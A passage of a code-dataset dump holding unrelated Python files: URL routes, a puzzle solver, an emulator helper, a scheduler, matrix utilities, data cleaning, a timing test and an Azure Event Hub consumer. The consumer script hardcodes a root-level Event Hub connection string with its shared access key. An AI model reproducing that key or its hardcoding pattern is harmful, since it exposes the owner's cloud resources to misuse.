'django.contrib.auth.views.logout',name='Logout'),\n url(r'^accounts/profile/$', 'bootstrap.views.profile',name='Profile'),\n)\n","sub_path":"thesite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607656468","text":"\"\"\"\nThis sliding-block puzzle solver implements the A-star algorithm to find the shortest list of moves\nresulting in a solved state.\n\"\"\"\n__author__ = \"Jasper Raynolds\"\n__license__ = \"MIT\"\n__date__ = \"February 2018\"\n\nimport heapq\nimport collections\n\n#### BLOCK PUZZLE OBJECT ####\n\nclass Block_Puzzle:\n\tdef __init__(self, blocks):\n\t\t\"\"\"\n\t\tConstructor. Takes a dictionary of integer-tuple pairs that describe block positions.\n\t\tAlternatively, takes a 2D list of integers that is then converted.\n\t\t\"\"\"\n\t\tif type(blocks) is list:\n\t\t\tself.blocks = self._list_to_dict(blocks)\n\t\telse :\n\t\t\tself.blocks = blocks\n\n\t\tself.width = self._get_width()\n\t\tself.height = int(len(self.blocks) / self.width)\n\n\tdef __eq__(self, other):\n\t\t\"\"\"\n\t\tEquals function. Returns whether block dictionaries are equal.\n\t\t\"\"\"\n\t\tif other == None:\n\t\t\treturn False\n\t\treturn self.blocks == other.blocks\n\n\tdef __lt__(self, other):\n\t\t\"\"\"\n\t\tLess-than function. Compares f-scores. If f-scores are equal, compares g-scores.\n\t\t\"\"\"\n\t\tif other == None:\n\t\t\treturn False\n\t\tif fScore[self] == fScore[other]:\n\t\t\treturn gScore[self] < gScore[other]\n\t\treturn fScore[self] < fScore[other]\n\n\tdef __hash__(self):\n\t\t\"\"\"\n\t\tHash function. Hashes a frozenset of the blocks.\n\t\t\"\"\"\n\t\treturn hash(frozenset(self.blocks.items()))\n\n\tdef _list_to_dict(self, blockList):\n\t\t\"\"\"\n\t\tConverts a 2D list of integers into a dictionary.\n\t\t\"\"\"\n\t\tdictionary = {}\n\n\t\tfor row in range(len(blockList)):\n\t\t\tfor col in range(len(blockList[0])):\n\t\t\t\tdictionary[blockList[row][col]] = (col, row);\n\n\t\treturn dictionary\n\n\tdef _get_width(self):\n\t\t\"\"\"\n\t\tReturns the width of this puzzle.\n\t\t\"\"\"\n\t\tmaxWidth = 0\n\t\tfor value in self.blocks.values():\n\t\t\tmaxWidth = max(value[0], maxWidth)\n\n\t\treturn maxWidth + 1\n\n\tdef to_string(self):\n\t\t\"\"\"\n\t\tReturns the state in an easy-to-read fashion.\n\t\t\"\"\"\n\t\tarray = []\n\n\t\tfor y in range(self.height):\n\t\t\t# print(\"y:\",y)\n\t\t\trow = []\n\t\t\tfor x in range(self.width):\n\t\t\t\t# print(\"x:\",x)\n\t\t\t\tfor block in self.blocks.items():\n\t\t\t\t\t# print(block)\n\t\t\t\t\tif block[1] == (x,y):\n\t\t\t\t\t\trow.append(block[0])\n\t\t\t\t\t\tbreak\n\t\t\tarray.append(row)\n\n\t\tstring = \"\\n\".join(\"\\t\".join('%i' %x for x in y) for y in array)\n\t\treturn string\n\n\tdef is_solvable(self):\n\t\t\"\"\"\n\t\tReturns true if the board is solvable, false if not.\n\t\tThis algorithmic solution provided by Adam Smith, Ph.D.\n\t\t\"\"\"\n\t\t# Flatten list, remove 0\n\t\tflat = []\n\t\trow0 = 0\n\t\tfor row in range(self.height):\n\t\t\tfor col in range(self.width):\n\t\t\t\tfor key in self.blocks:\n\t\t\t\t\tif self.blocks[key][0] == col and self.blocks[key][1] == row:\n\t\t\t\t\t\tif key == 0:\n\t\t\t\t\t\t\trow0 = row\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tflat.append(key)\n\t\t\t\n\t\t# Count inversions\n\t\tcount = 0\n\t\tfor block in flat:\n\t\t\tfor tile2 in flat:\n\t\t\t\tif flat.index(tile2) < flat.index(block) and tile2 > block:\n\t\t\t\t\tcount += 1\n\n\t\tif self.height % 2 == 0:\n\t\t\tif count % 2 == 0:\n\t\t\t\treturn True\n\t\telif (count + (self.height - row0 - 1)) % 2 == 0:\n\t\t\treturn True\n\t\treturn False\n\n\tdef create_solved_puzzle(self):\n\t\t\"\"\"\n\t\tReturns a solved puzzle from this puzzle's dimensions.\n\t\t\"\"\"\n\t\tcellArr = []\n\n\t\tfor row in range(self.height):\n\t\t\tboardRow = []\n\t\t\tfor col in range(self.width):\n\t\t\t\tboardRow.append((row * self.width) + col + 1)\n\t\t\tcellArr.append(boardRow)\n\n\t\tcellArr[self.height - 1][self.width - 1] = 0\n\n\t\tpuzzle = Block_Puzzle(cellArr)\n\t\t\n\t\treturn puzzle\n\n\tdef get_move(self, other):\n\t\t\"\"\"\n\t\tInterprets another puzzle as a move \"U\", \"D\", \"L\" or \"R\" from this one.\n\t\t\"\"\"\n\t\t# Compare both empty spaces\n\t\tthisEmpty = self.blocks[0]\n\t\tthatEmpty = other.blocks[0]\n\t\tmove = (thisEmpty[0] - thatEmpty[0], thisEmpty[1] - thatEmpty[1])\n\n\t\tmoveList = {(0,1): \"D\", (0,-1): \"U\", (1,0): \"R\", (-1,0): \"L\"}\n\t\treturn moveList[move]\n\n\tdef heuristic_estimate_manhattan(self, other):\n\t\t\"\"\"\n\t\tFinds the heuristic estimation of the cost to reach another state from this one.\n\t\tThis heuristic is based on \"manhattan distance.\"\n\t\tReturns the sum of each tile's orthogonal movement to reach its twin on the other board.\n\t\t\"\"\"\n\t\testimate = 0\n\n\t\tfor index in range(len(self.blocks)):\n\t\t\testimate += abs(other.blocks[index][0] - self.blocks[index][0]) + abs(other.blocks[index][1] - self.blocks[index][1])\n\n\t\treturn estimate\n\n\tdef heuristic_estimate_misplaced_tiles(self, other):\n\t\t\"\"\"\n\t\tFinds the heuristic estimation of the cost to reach another state from this one.\n\t\tThis heuristic is based on \"misplaced tiles.\"\n\t\tReturns the number of tiles, not including the blank, that are in a different location from their twin on the other board.\n\t\t\"\"\"\n\t\testimate = 0\n\n\t\tfor index in range(1, len(self.blocks), 1):\n\t\t\tif self.blocks[index] != other.blocks[index]:\n\t\t\t\testimate += 1\n\n\t\treturn estimate\n\n\tdef heuristic_estimate_maxSwap(self, other):\n\t\t\"\"\"\n\t\tFinds the heuristic estimation of the cost to reach another state from this one.\n\t\tThis heuristic is based on \"MaxSwap.\"\n\t\tReturns the number of moves it would take to convert this puzzle to the other if the empty tile could be freely switched.\n\t\t\"\"\"\n\t\testimate = 0\n\n\t\ttempBlocks = dict(self.blocks)\n\n\t\twhile(tempBlocks != other.blocks):\n\t\t\tfor index in range(1, len(self.blocks), 1):\n\t\t\t\tif tempBlocks[index] == other.blocks[index]:\n\t\t\t\t\tcontinue\n\t\t\t\tif tempBlocks[0] == other.blocks[index]:\n\t\t\t\t\ttempBlocks[0] = tempBlocks[index]\n\t\t\t\t\ttempBlocks[index] = other.blocks[index]\n\t\t\t\t\testimate += 1\n\n\t\treturn estimate\n\n\tdef get_neighbors(self, previous):\n\t\t\"\"\"\n\t\tGets all adjacent neighbors of the state, minus the previous.\n\t\tThis function gives 7 neighbors: 4 orthogonal, 4 diagonal, with the previous state trimmed.\n\t\t\"\"\"\n\t\tneighbors = []\n\n\t\tmoves = ((-1,0),(1,0),(0,-1),(0,1))\n\t\tzeroLoc = self.blocks[0]\n\n\t\tfor move in moves:\n\t\t\tnewZeroLoc = (zeroLoc[0] + move[0], zeroLoc[1] + move[1])\n\t\t\t# skip this state if we've moved off the board\n\t\t\tif newZeroLoc[0] < 0 or newZeroLoc[1] < 0 or newZeroLoc[0] > self.width-1 or newZeroLoc[1] > self.height-1:\n\t\t\t\t# print(\"we've moved off the board.\")\n\t\t\t\tcontinue\n\t\t\t# skip this state if it's the same as the previous\n\t\t\tif previous and previous.blocks[0] == newZeroLoc:\n\t\t\t\t# print(\"this is just the same!\")\n\t\t\t\tcontinue\n\n\n\t\t\tnewBlocks = dict(self.blocks)\n\t\t\t# move the 0\n\t\t\tnewBlocks[0] = newZeroLoc\n\n\t\t\t# move whatever's in that location...\n\t\t\t# to the previous one\n\t\t\tfor face, location in newBlocks.items():\n\t\t\t\tif face != 0 and location == newZeroLoc:\n\t\t\t\t\tnewBlocks[face] = zeroLoc\n\n\t\t\tneighbor = Block_Puzzle(newBlocks)\n\t\t\tneighbors.append(neighbor)\n\n\t\treturn neighbors\n\n#### A-STAR ALGORITHM ####\n\ndef aStar(start, goal):\n\t\"\"\"\n\tA star search algorithm. Takes a start state and an end state.\n\tWhile there are available moves, loops through them and exits if the end is found.\n\tReturns the list of states that are the \"quickest\" way to the end.\n\t\"\"\"\n\t# The set of states already evaluated\n\tclosedSet = set()\n\n\t# For each node, which node it can most efficiently be reached from.\n\t# If a node can be reached from many start, cameFrom will eventually contain the\n\t# most efficient previous step.\n\tcameFrom = {}\n\n\t# For each node, the total cost of getting from the start node to the goal\n\t# by passing by that node. That value is partly known, partly heuristic.\n\t# This variable is global for the Block_Puzzle object's __lt__ method.\n\tglobal fScore\n\tfScore = collections.defaultdict(lambda: float(\"inf\"))\n\n\t# For each node, the cost of getting from the start node to that node.\n\t# This variable is global for the Block_Puzzle object's __lt__ method.\n\tglobal gScore\n\tgScore = collections.defaultdict(lambda: float(\"inf\"))\n\n\t# The cost of going from start to start is zero.\n\tgScore[start] = 0\n\n\t# The heap of currently discovered state that are not evaluated yet.\n\t# Initially, only the start state is known.\n\topenHeap = [start]\n\theapq.heapify(openHeap)\n\n\t# For the first node, that value is completely heuristic.\n\tfScore[start] = start.heuristic_estimate_manhattan(goal)\n\n\t# The set of neighbors with equal f-scores to their progenitor.\n\t# This set is emptied first to avoid needless push/pop from the heap.\n\tequalSet = set()\n\n\t# While there are yet nodes to inspect,\n\twhile openHeap:\n\t\t# Get the lowest f-score state not yet evaluated.\n\t\tcurrent = heapq.heappop(openHeap)\n\n\t\t# Skip this state if it's a duplicate of one that's already been evaluated.\n\t\tif current in closedSet:\n\t\t\tcontinue\n\n\t\t# If we've reached the goal:\n\t\tif current == goal:\n\t\t\t# return the list of states it took to get there.\n\t\t\tpath = []\n\t\t\tpath.append(current)\n\t\t\tstep = current\n\t\t\twhile(cameFrom.get(step)):\n\t\t\t\tpath.append(cameFrom[step])\n\t\t\t\tstep = cameFrom[step]\n\t\t\tpath.reverse()\n\t\t\treturn path\n\n\t\t# make sure we don't visit this state again.\n\t\tclosedSet.add(current)\n\n\t\t# For each possible neighbor of our current state,\n\t\tfor neighbor in current.get_neighbors(cameFrom.get(current)):\n\t\t\t# Skip it if it's already been evaluated\n\t\t\tif neighbor in closedSet:\n\t\t\t\tcontinue\n\n\t\t\ttentative_gScore = gScore[current] + 1\n\t\t\t# If this path costs less than previous paths here...\n\t\t\tif tentative_gScore < gScore[neighbor]:\n\t\t\t\t# Update the values for this state.\n\t\t\t\tcameFrom[neighbor] = current\n\t\t\t\tgScore[neighbor] = tentative_gScore\n\t\t\t\tfScore[neighbor] = gScore[neighbor] + (1.0001 * neighbor.heuristic_estimate_manhattan(goal))\n\t\t\t\n\t\t\t# Finally, add it to our open heap\n\t\t\theapq.heappush(openHeap, neighbor)\n\n\treturn None\n\n#### SOLVER FUNCTION ####\n\ndef solve(cellArr):\n\t\"\"\"\n\tSolver function. Takes a 2D list of integers, starting from and including 0, in equal-length rows,\n\tand returns a list of single-letter string moves (e.g. \"U\", \"R\", \"D\")\n\t\"\"\"\n\t# Error handling\n\tif type(cellArr) is not list or type(cellArr[0]) is not list:\n\t\tprint(\"please pass a 2D integer list to this function.\")\n\t\treturn None\n\trowLength = len(cellArr[0])\n\tfor row in cellArr:\n\t\tif len(row) != rowLength:\n\t\t\tprint(\"all rows in the 2D integer list must be of equal length.\")\n\t\t\treturn None\n\n\t# from the cell list provided, create a Block Puzzle.\n\tpuzzle = Block_Puzzle(cellArr)\n\n\t# is this puzzle solvable?\n\tif not puzzle.is_solvable():\n\t\treturn None\n\n\t# find the solution puzzle for the given puzzle.\n\tgoal = puzzle.create_solved_puzzle()\n\n\t# run A* search algorithm.\n\tpath = aStar(puzzle, goal)\n\n\t# convert into single-letter moves.\n\tmoves = []\n\tfor index in range(len(path)-1):\n\t\tmoves.append(path[index].get_move(path[index+1]))\n\treturn moves\n\n#### TESTING ####\n\n# hard = [[6,5,2,3],\n# \t\t[0,7,11,4],\n# \t\t[9,1,10,8],\n# \t\t[15,14,13,12]]\n# print(solve(hard))\n\n# medium = [[1,2,3,4],\n# \t\t [0,7,11,5],\n# \t\t [9,6,10,8],\n# \t\t [15,14,13,12]]\n# print(solve(medium))\n\n# easy = [[1,2,3,4],\n# \t\t[0,5,6,7],\n# \t\t[9,10,11,8]]\n# print(solve(easy))\n","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":10486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"87083667","text":"from django.urls import path, include\nfrom rest_framework.authtoken.views import obtain_auth_token\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\n\nfrom . import views\n\nurlpatterns = [\n\n path(\"jobseeker/list/\", views.JobSeekerListView.as_view()),\n path(\"jobseeker/detail//\", views.JobSeekerRetrieveUpdateDeleteView.as_view()),\n path(\"jobseeker/create/\", views.JobSeekerCreateView.as_view()),\n\n path(\"vacancy/list/\", views.VacancyListView.as_view()),\n path(\"vacancy/detail//\", views.VacancyRetrieveUpdateDeleteView.as_view()),\n path(\"vacancy/create/\", views.VacancyCreateView.as_view()),\n\n path(\"profession/list/\", views.ProfessionListView.as_view()),\n path(\"profession/detail//\", views.ProfessionRetrieveUpdateDeleteView.as_view()),\n path(\"profession/create/\", views.ProfessionCreateView.as_view()),\n\n path(\"employer/list/\", views.EmployerListView.as_view()),\n path(\"employer/detail/\", views.EmployerRetrieveUpdateDeleteView.as_view()),\n path(\"employer/create/\", views.EmployerCreateView.as_view()),\n\n path(\"experience/list//\", views.ExperienceListView.as_view()),\n path(\"experience/detail/\", views.ExperienceRetrieveUpdateDeleteView.as_view()),\n path(\"experience/create/\", views.ExperienceCreateView.as_view()),\n\n path(\"resume/list/\", views.ResumeListView.as_view()),\n path(\"resume/detail/\", views.ResumeRetrieveUpdateDeleteView.as_view()),\n path(\"resume/create/\", views.ResumeCreateView.as_view()),\n\n path(\"application/list/\", views.ApplicationListView.as_view()),\n path(\"application/detail/\", views.ApplicationRetrieveUpdateDeleteView.as_view()),\n path(\"application/create/\", views.ApplicationCreateView.as_view()),\n\n]\n","sub_path":"students/k3340/laboratory_works/Nurdinov_Rostislav/laboratory_work_4/backend/exchange_engine/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"80445201","text":"import json\nimport os\nfrom os import stat_result\n\nfrom unicorn import Uc\n\ndef _get_def_dic():\n return {\n 'st_dev': 0,\n '__st_ino': 0,\n 'st_mode': 0,\n 'st_nlink': 0,\n 'st_uid': 0,\n 'st_gid': 0,\n 'st_rdev': 0,\n 'st_size': 0,\n 'st_blksize': 0,\n 'st_blocks': 0,\n 'st_atime': 0,\n 'st_atime_ns': 0,\n 'st_mtime': 0,\n 'st_mtime_ns': 0,\n 'st_ctime': 0,\n 'st_ctime_ns': 0,\n 'st_ino': 0\n }\n#\ndef stat64(path):\n if (path == None):\n return _get_def_dic()\n #\n meta_path = path + '.meta_emu'\n\n if not os.path.exists(meta_path):\n meta_path_dir = os.path.dirname(meta_path)\n\n if not os.path.isdir(meta_path_dir):\n os.makedirs(meta_path_dir)\n\n with open(meta_path, 'w') as f:\n json.dump(_get_def_dic(), fp=f, indent=4)\n #\n #\n \n with open(meta_path, 'r') as f:\n return json.load(fp=f)\n\ndef stat_to_memory2(uc, buf_ptr, stat, uid):\n '''\n unsigned long long st_dev; \n unsigned char __pad0[4]; \n unsigned long __st_ino; \n unsigned int st_mode; \n nlink_t st_nlink; 4\n uid_t st_uid; 4\n gid_t st_gid; 4\n unsigned long long st_rdev; \n unsigned char __pad3[4]; \n long long st_size; \n unsigned long st_blksize; \n unsigned long long st_blocks; \n struct timespec st_atim; 8\n struct timespec st_mtim; 8\n struct timespec st_ctim; 8\n unsigned long long st_ino; \n\n '''\n\n uc.mem_write(buf_ptr, int(stat.st_dev).to_bytes(8, byteorder='little'))\n uc.mem_write(buf_ptr + 8, int(0).to_bytes(4, byteorder='little')) # PAD 4\n uc.mem_write(buf_ptr + 12, int(stat.st_ino).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 16, int(stat.st_mode).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 20, int(stat.st_nlink).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 24, int(uid).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 28, int(uid).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 32, int(stat.st_rdev).to_bytes(8, byteorder='little'))\n uc.mem_write(buf_ptr + 40, int(0).to_bytes(4, byteorder='little')) # PAD 4\n uc.mem_write(buf_ptr + 48, int(stat.st_size).to_bytes(8, byteorder='little'))\n uc.mem_write(buf_ptr + 56, int(stat.st_blksize).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 64, int(stat.st_blocks).to_bytes(8, byteorder='little'))\n\n uc.mem_write(buf_ptr + 72, int(stat.st_atime).to_bytes(8, byteorder='little'))\n uc.mem_write(buf_ptr + 80, int(stat.st_mtime).to_bytes(8, byteorder='little'))\n uc.mem_write(buf_ptr + 88, int(stat.st_ctime).to_bytes(8, byteorder='little'))\n\n uc.mem_write(buf_ptr + 96, int(stat.st_ino).to_bytes(8, byteorder='little'))\n#","sub_path":"androidemu/vfs/file_helpers.py","file_name":"file_helpers.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"394641918","text":"\"\"\"\nCreated on 2011-02-07\n\n@author: Bohdan Mushkevych\n\"\"\"\n\nfrom datetime import datetime\nfrom threading import Lock\nfrom amqplib.client_0_8 import AMQPException\n\nfrom flopsy.flopsy import PublishersPool\nfrom system.decorator import with_reconnect\nfrom system.synergy_process import SynergyProcess\nfrom system.collection_context import CollectionContext\nfrom system.collection_context import COLLECTION_SCHEDULER_CONFIGURATION\nfrom system.repeat_timer import RepeatTimer\nfrom system.process_context import *\n\nfrom hadoop_pipeline import HadoopPipeline\nfrom regular_pipeline import RegularPipeline\nfrom model.scheduler_configuration_entry import SchedulerConfigurationEntry\nfrom time_table import TimeTable\n\n\nclass Scheduler(SynergyProcess):\n \"\"\" Scheduler encapsulate logic for starting the aggregators/alerts/other readers \"\"\"\n\n def __init__(self, process_name):\n super(Scheduler, self).__init__(process_name)\n self.logger.info('Starting %s' % self.process_name)\n self.publishers = PublishersPool(self.logger)\n self.thread_handlers = dict()\n self.lock = Lock()\n self.timetable = TimeTable(self.logger)\n self.regular_pipeline = RegularPipeline(self, self.timetable)\n self.hadoop_pipeline = HadoopPipeline(self, self.timetable)\n self.logger.info('Started %s' % self.process_name)\n\n\n def __del__(self):\n for handler in self.thread_handlers:\n handler.cancel()\n self.thread_handlers.clear()\n super(Scheduler, self).__del__()\n\n\n def _log_message(self, level, process_name, time_record, msg):\n \"\"\" method performs logging into log file and TimeTable node\"\"\"\n self.timetable.add_log_entry(process_name, time_record, datetime.utcnow(), msg)\n self.logger.log(level, msg)\n\n\n # **************** Scheduler Methods ************************\n @with_reconnect\n def start(self):\n \"\"\" reading scheduler configurations and starting timers to trigger events \"\"\"\n collection = CollectionContext.get_collection(self.logger, COLLECTION_SCHEDULER_CONFIGURATION)\n cursor = collection.find({})\n if cursor.count() == 0:\n raise LookupError('MongoDB has no scheduler configuration entries')\n\n for entry in cursor:\n document = SchedulerConfigurationEntry(entry)\n interval = document.get_interval()\n is_active = document.get_process_state() == SchedulerConfigurationEntry.STATE_ON\n type = ProcessContext.get_type(document.get_process_name())\n parameters = [document.get_process_name(), document]\n\n if type == TYPE_ALERT:\n function = self.fire_alert\n elif type == TYPE_HORIZONTAL_AGGREGATOR:\n function = self.fire_worker\n elif type == TYPE_VERTICAL_AGGREGATOR:\n function = self.fire_worker\n elif type == TYPE_GARBAGE_COLLECTOR:\n function = self.fire_garbage_collector\n else:\n self.logger.error('Can not start scheduler for %s since it has no processing function' % type)\n continue\n\n handler = RepeatTimer(interval, function, args=parameters)\n self.thread_handlers[document.get_process_name()] = handler\n\n if is_active:\n handler.start()\n self.logger.info('Started scheduler for %s:%s, triggering every %d seconds'\\\n % (type, document.get_process_name(), interval))\n else:\n self.logger.info('Handler for %s:%s registered in Scheduler. Idle until activated.'\\\n % (type, document.get_process_name()))\n\n # as Scheduler is now initialized and running - we can safely start its MX\n self.start_mx()\n\n\n def start_mx(self):\n \"\"\" method's only purpose: import MX module (which has back-reference import to scheduler) and start it \"\"\"\n from mx.mx import MX\n self.mx = MX(self)\n self.mx.start_mx_thread()\n\n\n def fire_worker(self, *args):\n \"\"\"requests vertical aggregator (hourly site, daily variant, etc) to start up\"\"\"\n try:\n process_name = args[0]\n self.lock.acquire()\n self.logger.info('%s {' % process_name)\n time_record = self.timetable.get_next_timetable_record(process_name)\n time_qualifier = ProcessContext.get_time_qualifier(process_name)\n\n if time_qualifier == ProcessContext.QUALIFIER_HOURLY:\n self.regular_pipeline.manage_pipeline_for_process(process_name, time_record)\n else:\n self.hadoop_pipeline.manage_pipeline_for_process(process_name, time_record)\n\n except (AMQPException, IOError) as e:\n self.logger.error('AMQPException: %s' % str(e), exc_info=True)\n self.publishers.reset_all_publishers(suppress_logging=True)\n except Exception as e:\n self.logger.error('Exception: %s' % str(e), exc_info=True)\n finally:\n self.logger.info('}')\n self.lock.release()\n\n\n def fire_alert(self, *args):\n \"\"\" Triggers AlertWorker. Makes sure its trees have\n finalized corresponding timeperiods prior to that\"\"\"\n try:\n process_name = args[0]\n self.lock.acquire()\n self.logger.info('%s {' % process_name)\n\n time_record = self.timetable.get_next_timetable_record(process_name)\n self.hadoop_pipeline.manage_pipeline_with_blocking_dependencies(process_name, time_record)\n except (AMQPException, IOError) as e:\n self.logger.error('AMQPException: %s' % str(e), exc_info=True)\n self.publishers.reset_all_publishers(suppress_logging=True)\n except Exception as e:\n self.logger.error('Exception: %s' % str(e), exc_info=True)\n finally:\n self.logger.info('}')\n self.lock.release()\n\n\n def fire_garbage_collector(self, *args):\n \"\"\"fires garbage collector to re-run all invalid records\"\"\"\n try:\n process_name = args[0]\n self.lock.acquire()\n self.logger.info('%s {' % process_name)\n\n self.publishers.get_publisher(process_name).publish({})\n self.logger.info('Publishing trigger for garbage_collector')\n self.timetable.build_tree()\n self.timetable.validate()\n self.logger.info('Validated Timetable for all trees')\n except (AMQPException, IOError) as e:\n self.logger.error('AMQPException: %s' % str(e), exc_info=True)\n self.publishers.reset_all_publishers(suppress_logging=True)\n except Exception as e:\n self.logger.error('fire_garbage_collector: %s' % str(e))\n finally:\n self.logger.info('}')\n self.lock.release()\n\n\nif __name__ == '__main__':\n from system.process_context import PROCESS_SCHEDULER\n\n source = Scheduler(PROCESS_SCHEDULER)\n source.start()","sub_path":"scheduler/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"327053371","text":"from math import sqrt\n\n\ndef matrix_mult(a, b):\n \"\"\"\n Function that multiplies two matrices a and b\n\n Parameters\n ----------\n a,b : matrices\n\n Returns\n -------\n new_array : matrix\n The matrix product of the inputs\n \"\"\"\n new_array = []\n for i in range(len(a)):\n new_array.append([0 for i in range(len(b[0]))])\n for j in range(len(b[0])):\n for k in range(len(a[0])):\n new_array[i][j] += a[i][k] * b[k][j]\n\n return new_array\n\n\ndef matrix_vector_mult(matrix, vector):\n new_vector = []\n for row in range(len(matrix)):\n new_vector.append(0)\n for column in range(len(matrix[row])):\n new_vector[row] += matrix[row][column] * vector[column]\n\n return new_vector\n\n\ndef print_matrix(matrix):\n for row in matrix:\n for val in row:\n print('{:4}'.format(val), end=\" \")\n print()\n\n print()\n\n\ndef vector_inf_norm(vector):\n maximum = abs(vector[0])\n for i in range(1, len(vector)):\n if abs(vector[i]) > maximum:\n maximum = abs(vector[i])\n\n return maximum\n\n\ndef sub_vector(vector1, vector2):\n new_vector = []\n for i in range(len(vector1)):\n new_vector.append(vector1[i] - vector2[i])\n return new_vector\n\n\ndef vector_mult(vector1, vector2):\n new_matrix = []\n for i in range(len(vector1)):\n new_matrix.append([0 for i in range(len(vector2))])\n for j in range(len(vector2)):\n new_matrix[i][j] = vector1[i]*vector2[j]\n return new_matrix\n\n\ndef transpose(matrix):\n transposed_matrix = []\n [transposed_matrix.append([0.0 for i in range(len(matrix))]) for j in range(len(matrix[0]))]\n for column_index in range(len(matrix[0])):\n temp_list = []\n for row_index in range(len(matrix)):\n temp_list.append(matrix[row_index][column_index])\n transposed_matrix[column_index] = temp_list\n return transposed_matrix\n\n\ndef equal_matrices(matrix1, matrix2):\n for i in range(len(matrix1)):\n for j in range(len(matrix1)):\n if matrix1[i][j] != matrix2[i][j]:\n return False\n\n return True\n\n\ndef vector_magnitude(vector):\n magnitude = 0\n for i in range(len(vector)):\n magnitude += vector[i]*vector[i]\n\n return sqrt(magnitude)","sub_path":"Second Project/Exercise5/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644075855","text":"import pandas as pd\n\ndef drop_null_features(df):\n for feature in df:\n if df[feature].isnull().sum() > (len(df) / 2):\n df = df.drop(feature, axis=1)\n return df\n\ndef drop_missing_data(df, list_cols):\n for col in list_cols:\n df = df.drop(df[df[col].isnull() == True].index)\n return df\n\ndef drop_features(df, list_cols):\n for col in list_cols:\n df = df.drop(col, axis=1)\n return df\n\ndef drop_aggregate_features(df, num_features):\n return df[df.columns[:-(num_features)]]\n\ndef create_state_dict(df, col1, col2):\n states1 = df[col1].unique()\n states2 = df[col2].unique()\n states = set(states1).union(states2)\n state_dict = {}\n for idx, state in enumerate(states):\n state_dict[state] = idx\n return state_dict\n\ndef replace_states(df, col1, col2):\n state_dict = create_state_dict(df, col1, col2)\n return df.replace({col1: state_dict}).replace({col2: state_dict})\n\n\nif __name__ == '__main__':\n full_df = pd.read_csv('../data/data_full.csv', index_col=0)\n mal_df = full_df[full_df['rectype'] == 'M']\n\n mal_df = drop_null_features(mal_df)\n\n # 'seqno' unique for each row, not useful\n # All 'rectype' are 'M', not useful\n useless_features = ['seqno', 'rectype']\n mal_df = drop_features(mal_df, useless_features)\n\n # Drop features with all 0 values\n zero_features = ['totalpmt', 'accrrpts']\n mal_df = drop_features(mal_df, zero_features)\n\n # Drop rows with missing data\n missing_features = ['practage', 'grad', 'workstat', 'licnstat', 'paynumbr']\n mal_df = drop_missing_data(mal_df, missing_features)\n\n # Drop features that were aggregated after malpractice settlement\n mal_df = drop_aggregate_features(mal_df, 10)\n\n # Convert 'workstat' and 'licnstat' states to integers\n mal_df = replace_states(mal_df, 'workstat', 'licnstat')\n\n mal_df.to_csv('../data/data_malpractice.csv')\n","sub_path":"code/feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574206337","text":"import threadpool\nimport multiprocessing\nimport time\nimport os,sys\nimport traceback\n\nthreadsNum = 5\n\n\ndef fun1(num):\n\tsum_num = 0\n\tfor i in range(num):\n\t\tsum_num += i\n\tprint(sum_num)\n\n\nparaList = [[10000000],[10000000],[10000000]]\nprint('start multiprocessing')\ntime1 = time.time()\npool = multiprocessing.Pool(threadsNum)\npool.starmap(fun1, paraList)\npool.close()\npool.join()\ntime2 = time.time()\nprint(time2-time1)\nprint('end')\n\n\nparaList = []\nparaList.append(([10000000], None))\nparaList.append(([10000000], None))\nparaList.append(([10000000], None))\nprint('start threadpool')\ntime3=time.time()\npool = threadpool.ThreadPool(threadsNum)\nrequests = threadpool.makeRequests(fun1, paraList)\n[pool.putRequest(req) for req in requests]\npool.wait()\ntime4=time.time()\nprint(time4-time3)\nprint('end')\n\n\t\n\n\n","sub_path":"threadpool_vs_multiprocess_ForTime.py","file_name":"threadpool_vs_multiprocess_ForTime.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"125304454","text":"# Load Packages.\nimport logging\nfrom azure.eventhub import EventHubConsumerClient\n\n# Declare the Connection string of event hub namespace, Event hub 2 name, consumer_group ($Default is the default consumer group).\nconnection_str = 'Endpoint=sb://eventhub1creditfraud.servicebus.windows.net/;SharedAccessKeyName=RootManageSharedAccessKey;SharedAccessKey=pm/II1egBW5aMxh7y0s5sI/b7F40njRJTZkyN7fQTfo='\nconsumer_group = '$Default'\neventhub_name = 'creditfraudhub2'\n# Create a consumer client to consume events from the event hub.\nclient = EventHubConsumerClient.from_connection_string(connection_str, consumer_group, eventhub_name=eventhub_name)\nlogger = logging.getLogger(\"azure.eventhub\")\nlogging.basicConfig(level=logging.INFO)\n\n# Whenever a event is received by event hub 2 the on_event function will be run.\ndef on_event(partition_context, event):\n #logger.info(\"Received event from partition {}\".format(partition_context.partition_id))\n print(\"Received the event: \\\"{}\\\" from the partition with ID: \\\"{}\\\"\".format(event.body_as_str(encoding='UTF-8'), partition_context.partition_id))\n print(event.body_as_str(encoding='UTF-8'))\n #res_dict = json.loads(result.decode('utf-8')) \n partition_context.update_checkpoint(event)\n #print(res_dict)\n print('-' * 20)\n\nwith client:\n client.receive(\n on_event=on_event, \n 